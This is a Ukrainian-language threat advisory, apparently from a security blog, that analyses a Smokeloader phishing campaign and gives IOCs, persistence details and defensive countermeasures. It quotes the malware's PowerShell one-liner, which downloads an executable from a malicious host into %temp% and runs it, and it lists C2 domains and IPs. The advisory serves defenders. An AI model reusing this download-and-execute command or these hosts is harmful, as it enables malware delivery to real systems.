  • Заборона створення та зчитування/запуску *.JS*, *.VB*, *.WS*, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !

Для оптимального захисту:

  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_171017

Доброго дня, панове.

Вчора було зафіксовано спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядав раніше – тут, тут і тут).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS скрипти у оболонці 7z.

Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітким іменем файлу.

Цікаво, що завантаження відбувається не через WSH а засобами Powershell.

Користувачі захисту кінцевих точок McAfee – зверніть увагу, payload уже детектується по GTI.

Схема атаки:

email > Attach (7z) > JS > single hardcoded URL > GET > %temp%\65536.exe

Маркери IOC:

архів:

File name документи.7z
SHA-256 397ad07ab15f802559ac1829ac9c8434bc7c0b6fb55264b088659b638a28ad0d

скрипт приманка:

File name Договор_1743.js
SHA-256 56d9c0da7f825cb474633057e12a1cf197af2352bd0d876591483e2d40472fda

основна частина:

File name pax.exe      >> %temp%\65536.exe
SHA-256 99671ce5287926ac6496a37abd42c87cc1a045696244cc833c3dbc041270cc25

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Договор_1743.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';$http_request.open('GET', 'h11p://docfileserver.ru/bank/pax.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run 
Classes
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає новий екземпляр explorer.exe і оперує від його імені.

Трафік скомпрометованої системи:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Відволікаючи маневр – з’єднання із сайтами java, MS etc

[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT 
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED
[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

49.51.38.37 80 HTTP 368 docfileserver.ru GET /bank/pax.exe HTTP/1.1

трафік системи після зараження:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR